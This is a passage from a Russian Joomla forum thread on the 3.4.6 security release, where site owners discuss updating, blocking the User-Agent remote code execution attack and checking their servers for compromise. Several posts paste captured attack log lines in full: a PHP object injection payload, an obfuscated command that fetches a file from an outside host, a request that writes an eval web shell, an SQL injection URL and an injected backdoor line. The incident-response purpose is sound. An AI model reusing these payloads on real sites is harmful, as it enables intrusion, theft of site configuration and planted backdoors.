0 Пользователей и 1 Гость просматривают эту тему.
  • 127 Ответов
  • 6449 Просмотров
*

jurassik

  • Давно я тут
  • 667
  • 50 / 1
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #30 : 15.12.2015, 11:48:03 »
при обновлении 3х сайтов на хостинге nic c Joomla! 3.4.5 до Joomla! 3.4.6 белая страница.
откатился назад.
на других хостингах норма.
сам шучу - сам смеюсь
*

Olg

  • Завсегдатай
  • 1039
  • 76 / 1
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #31 : 15.12.2015, 11:53:26 »
при обновлении 3х сайтов на хостинге nic c Joomla! 3.4.5 до Joomla! 3.4.6 белая страница.
откатился назад.
на других хостингах норма.
Одна из возможных причин.
*

revisium

  • Осваиваюсь на форуме
  • 37
  • 11 / 0
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #32 : 15.12.2015, 11:54:09 »
Вчера выпустили хотфиксы для Joomla 1.5 и 2.5
https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
--
http://revisium.com/ - лечение сайтов и защита от взлома.
*

wishlight

  • Живу я здесь
  • 3808
  • 234 / 1
  • skype aqaus.com
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #33 : 15.12.2015, 12:07:06 »
Вчера выпустили хотфиксы

На свои сайты уже поставил
*

Филипп Сорокин

  • Сорокин Band
  • 1843
  • 150 / 4
  • разработчик.москва
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #34 : 15.12.2015, 13:01:41 »
Блокирование атаки средствами Apache для тех, кто не может (или не хочет) обновиться:

Код
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} JDatabaseDriverMysqli? [NC]
RewriteRule .? - [F]
*

12mv

  • Давно я тут
  • 506
  • 20 / 0
  • Гульсина
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #35 : 15.12.2015, 13:28:28 »
Блокирование атаки средствами Apache для тех, кто не может (или не хочет) обновиться:

Код
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} JDatabaseDriverMysqli? [NC]
RewriteRule .? - [F]

И что это даёт? можно подробнее? )
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #36 : 15.12.2015, 13:49:42 »
Мдаа... 10 лет...
@b2z
да
Последние четыре года все дырки, это ощущение что это были специально реализованные бэкдоры, просто сейчас их массово находят сторонние, и их закрывают.
И что нас еще ждет, тогда?
*

wishlight

  • Живу я здесь
  • 3808
  • 234 / 1
  • skype aqaus.com
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #37 : 15.12.2015, 13:53:12 »
И что это даёт? можно подробнее? )

Запрос редиректит в другой.
*

b2z

  • Глобальный модератор
  • 6936
  • 753 / 0
  • Разраблю понемногу
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #38 : 15.12.2015, 14:32:55 »
@b2z
да
Последние четыре года все дырки, это ощущение что это были специально реализованные бэкдоры, просто сейчас их массово находят сторонние, и их закрывают.
И что нас еще ждет, тогда?
А никто не знает. К сожалению, это реалии разработки - дыры будут вылазить всегда, это вопрос времени. Уверен, что не только в Joomla.
*

Филипп Сорокин

  • Сорокин Band
  • 1843
  • 150 / 4
  • разработчик.москва
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #39 : 15.12.2015, 15:13:45 »
И что это даёт? можно подробнее? )

Если в строке User Agent присутствуют признаки инъекции, то Apache блокирует соединение. Удаленное исполнение кода возможно при помощи подделки строки User Agent, которая помещается в БД без обработки.

Запрос редиректит в другой.

Там нет редиректа, есть запрет доступа.
*

wishlight

  • Живу я здесь
  • 3808
  • 234 / 1
  • skype aqaus.com
*

SeregaC

  • Новичок
  • 3
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #41 : 15.12.2015, 20:33:32 »
рекомендуется поискать в логах “JDatabaseDriverMysqli” или “O:” в User Agent, проверив, не был ли уже применен эксплоит

нашел в логах вот это
Цитировать
77.247.181.162 - - [15/Dec/2015:19:14:19 +0300] "GET / HTTP/1.0" 200 12440 "http://***.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил
*

Physicist

  • Глобальный модератор
  • 917
  • 185 / 0
  • Рябов Денис
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #42 : 15.12.2015, 20:55:13 »
я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
Проверять файловую систему на наличие сторонних или измененных файлов (могли загрузить шелл) и базу данных на добавленных администраторов.
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #43 : 15.12.2015, 21:19:34 »
нашел в логах вот этоя так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил

Вы просто из тех кому не повезло.
*

fbr

  • Завсегдатай
  • 1280
  • 149 / 6
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #44 : 15.12.2015, 21:59:03 »
Сайты на https кто-нибудь обновлял?
Мне сегодня человек написал, что после обновления слетели все стили
Я посмотреть не успел, он его уже откатил ...
*

Physicist

  • Глобальный модератор
  • 917
  • 185 / 0
  • Рябов Денис
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #45 : 15.12.2015, 22:41:27 »
Вот тут выложили нагрузку, которую выполняли на сайтах вчера: http://pastebin.com/e25zxcn6
(из обсуждения на https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html)

Выполняет следующее:
1. Полностью сливает configuration.php.
2. Патчит index.php, includes/framework.php, includes/defines.php.
3. Сохраняет одну-две копии шелла в случайно выбранных директориях, доступных на запись. По-идее, эти файлы можно найти чем-то вроде

find . -regex '(?:sort|conf|utf8|cp1251|backup|cache|reverse|bin|cgi|memcache|sql)-[0-9a-f]{2,3}\.php'

Только учтите, что сейчас уже есть готовый модуль для Metasploit и нагрузка может быть произвольной.
*

SeregaC

  • Новичок
  • 3
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #46 : 15.12.2015, 22:52:19 »
Проверять файловую систему на наличие сторонних или измененных файлов (могли загрузить шелл) и базу данных на добавленных администраторов.
Спасибо, ничего подозрительного не нашел, потому что не знаю что искать, просто восстановил сайт из резервной копии

Сайты на https кто-нибудь обновлял?
Мне сегодня человек написал, что после обновления слетели все стили
Я посмотреть не успел, он его уже откатил ...
у меня https - все нормально
*

mocart

  • Захожу иногда
  • 112
  • 9 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #47 : 15.12.2015, 23:34:04 »
нашел в логах вот это
Код
77.247.181.162 - - [15/Dec/2015:19:14:19 +0300] "GET / HTTP/1.0" 200 12440 "http://***.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил

Тоже у себя нашел, но несколькими часами ранее обновился.
IP 36.250.176.75 сначала запросил htaccess.txt, далее это, следующим действием было
Код
"GET //?1=ZnB1dHMoZm9wZW4oInNpdGVtYS5waHAiLCJ3IiksJzw/cGhwIGV2YWwoJF9QT1NUWzFdKTs/PicpO3BocGluZm8oKTs= HTTP/1.0"
***
GET //?1=fputs(fopen("sitema.php","w"),'<?php eval($_POST[1]);?>');phpinfo();
 
И последнее действие от этого ip:
Код
"GET /index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=(select%201%20from%20(select%20count(*),concat((select%200x6275677363616E776B),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.0"
*

al707

  • Осваиваюсь на форуме
  • 35
  • 1 / 0
  • Тамиров Александр
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #48 : 16.12.2015, 02:16:42 »
анализ логов некоторых моих сайтов показал атаки с IP

89.234.157.254 - - [15/Dec/2015:18:57:01 +0300]
77.247.181.165 - - [15/Dec/2015:18:50:46 +0300]
173.14.173.227 - - [15/Dec/2015:19:37:34 +0300]
171.25.193.131 - - [15/Dec/2015:19:30:08 +0300]
Какая разница, IP прокси-серверов, TOR, компьютеры ботнетов и  т. п.
Матчасть нужно учить - исходники Joomla, исходники PHP на C и т. п.
https://www.cvedetails.com/vulnerability-list/vendor_id-3496/product_id-16499/Joomla-Joomla-.html
Наверняка это верхушка айсберга..
Люблю изучать то, что считаю перспективным, делиться опытом, иногда помогать.
*

b2z

  • Глобальный модератор
  • 6936
  • 753 / 0
  • Разраблю понемногу
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #49 : 16.12.2015, 08:12:02 »
Чего за паника, какая верхушка? Так можно сказать о любом движке. Да, сложилось так, что у Joomla нашли подряд несколько, но до этого очень долго ничего не находили.

https://www.cvedetails.com/vendor/3496/Joomla.html
https://www.cvedetails.com/vendor/2337/Wordpress.html
https://www.cvedetails.com/vendor/1367/Drupal.html
*

fatalerror

  • Захожу иногда
  • 441
  • 48 / 2
  • Уполномоченный по правам чайников
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #50 : 16.12.2015, 08:26:21 »
У себя нашел подряд несколько

Код
195.22.126.198 - - [16/Dec/2015:06:30:22 +0600] "GET / HTTP/1.0" 200 3048 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:954:\"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(112).chr(111).chr(110).chr(101).chr(110).chr(116).chr(115).chr(59).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(95).chr(109).chr(101).chr(100).chr(105).chr(97).chr(59).chr(114).chr(109).chr(32).chr(45).chr(114).chr(102).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(99).chr(117).chr(114).chr(108).chr(32).chr(45).chr(79).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(116).chr(105).chr(112).chr(116).chr(111).chr(112).chr(99).chr(111).chr(109).chr(46).chr(116).chr(118).chr(47).chr(98).chr(108).chr(111).chr(103).chr(47).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(109).chr(118).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(32).chr(97).chr(106).chr(97).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

И сразу за этим

Код
195.22.126.198 - - [16/Dec/2015:06:30:23 +0600] "GET /components/com_media/ajax.php HTTP/1.0" 404 307 "-" "curl/7.26.0"

Вчера вечером, правда, обновился. Бегло просмотрел - кажется файлы сегодня не менялись...

Может грохнуть сайт, да по новой накатить? все одно в разработке, там на день делов. Что посоветуете?
Расстреляно форумчан за нецензурщину: 1 (один).  Дерьмо случается...
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #51 : 16.12.2015, 12:29:14 »
Чего за паника, какая верхушка?
@b2z
Думаю это не паника, просто интерес. Это хорошо что у кого то есть интерес и они тратят свое время на изучение каких либо моментов, они могут неправильно что то трактовать, но и информацию соберут и донесут до тех кто ей возможно воспользуется.
*

master-smeta

  • Захожу иногда
  • 275
  • 9 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #52 : 16.12.2015, 13:05:21 »
нашел у себя в логах это:
Спойлер
[свернуть]
также были изменены файлы index.php (в корне сайта) и /includes/defines.php
в них добавлена такая гадость:
Код
if (isset($_REQUEST["aBE"])) {@extract($_REQUEST);@die($aBE($Ft));}
файлы почистил, все пароли сменил. посмотрим, что будет дальше
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #53 : 16.12.2015, 13:13:14 »
Вам не просто файлы почистить теперь надо, вам надо просканировать весь сайт на предмет стороннего кода.

Важно! Если кто видит у себя в логах
Код
JDatabaseDriverMysqli
или
Код
O:
это означает что вас уже взломали!
Искать требуется Вам теперь сторонний код на сайте, полностью сканировать и чистить, если хостинг и несколько сайтов то на всех соседних которые не разграничены по правам и пользователям.
*

fsv

  • Живу я здесь
  • 2537
  • 370 / 2
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #54 : 16.12.2015, 13:22:58 »
Если кто видит у себя в логах
Код
JDatabaseDriverMysqli
или
Код
O:
это означает что вас уже взломали!
Если в логах это я вижу по времени после обновления, это значит "взломали" или "пытались взломать"?
Несколько сайтов на J1.5 (разные клиенты старые). Стоит ли их озадачивать этой новой работой (проверка сайта)? Есть данные?
Веб-разработка: заказ.
*

wishlight

  • Живу я здесь
  • 3808
  • 234 / 1
  • skype aqaus.com
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #55 : 16.12.2015, 13:26:18 »
Уязвимы все версии Joomla. Стоит.
*

al707

  • Осваиваюсь на форуме
  • 35
  • 1 / 0
  • Тамиров Александр
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #56 : 16.12.2015, 13:27:02 »
Чего за паника, какая верхушка? Так можно сказать о любом движке. Да, сложилось так, что у Joomla нашли подряд несколько, но до этого очень долго ничего не находили.

https://www.cvedetails.com/vendor/3496/Joomla.html
https://www.cvedetails.com/vendor/2337/Wordpress.html
https://www.cvedetails.com/vendor/1367/Drupal.html
А я не говорил, что такая ситуация только с Joomla, с другими движками, наверное даже хуже. Впрочем, как и если выйти из рамок программирования, и оглянуться на мир в целом.. Кто не включает голову, тот тихо исчезнет в силу естественного отбора ))
« Последнее редактирование: 16.12.2015, 13:30:16 от al707 »
Люблю изучать то, что считаю перспективным, делиться опытом, иногда помогать.
*

fsv

  • Живу я здесь
  • 2537
  • 370 / 2
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #57 : 16.12.2015, 13:28:54 »
Уязвимы все версии Joomla. Стоит.
Я не совсем это спрашивал. Обновление было. В логах появились записи после обновления.
Веб-разработка: заказ.
*

Филипп Сорокин

  • Сорокин Band
  • 1843
  • 150 / 4
  • разработчик.москва
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #58 : 16.12.2015, 13:36:50 »
Вам не просто файлы почистить теперь надо, вам надо просканировать весь сайт на предмет стороннего кода.

Важно! Если кто видит у себя в логах
Код
JDatabaseDriverMysqli
или
Код
O:
это означает что вас уже взломали!
Искать требуется Вам теперь сторонний код на сайте, полностью сканировать и чистить, если хостинг и несколько сайтов то на всех соседних которые не разграничены по правам и пользователям.

Это означает, что кто-то подменил строку User Agent. Сей факт подтверждает лишь факт атаки, но не взлома.
*

voland

  • Легенда
  • 9758
  • 540 / 107
  • Эта строка съедает место на вашем мониторе
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #59 : 16.12.2015, 13:37:24 »
Если в логах это я вижу по времени после обновления, это значит "взломали" или "пытались взломать"?
Несколько сайтов на J1.5 (разные клиенты старые). Стоит ли их озадачивать этой новой работой (проверка сайта)? Есть данные?
Если после - то пытались взломать
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не устанавливается Joomla 3

Автор olikCZ

Ответов: 4
Просмотров: 82
Последний ответ 16.01.2018, 17:58:09
от olikCZ
Установить виджет на Joomla 3.8

Автор Civik35

Ответов: 4
Просмотров: 133
Последний ответ 16.01.2018, 07:53:43
от Arkadiy
Нумерация элементов в админке Joomla

Автор romagromov

Ответов: 0
Просмотров: 32
Последний ответ 15.01.2018, 14:29:50
от romagromov
Эффективность core Joomla

Автор ruslan13

Ответов: 69
Просмотров: 920
Последний ответ 12.01.2018, 16:20:55
от ruslan13
Прблема Joomla с большим количеством материала (статей)

Автор ruslan13

Ответов: 4
Просмотров: 186
Последний ответ 10.01.2018, 05:05:31
от ruslan13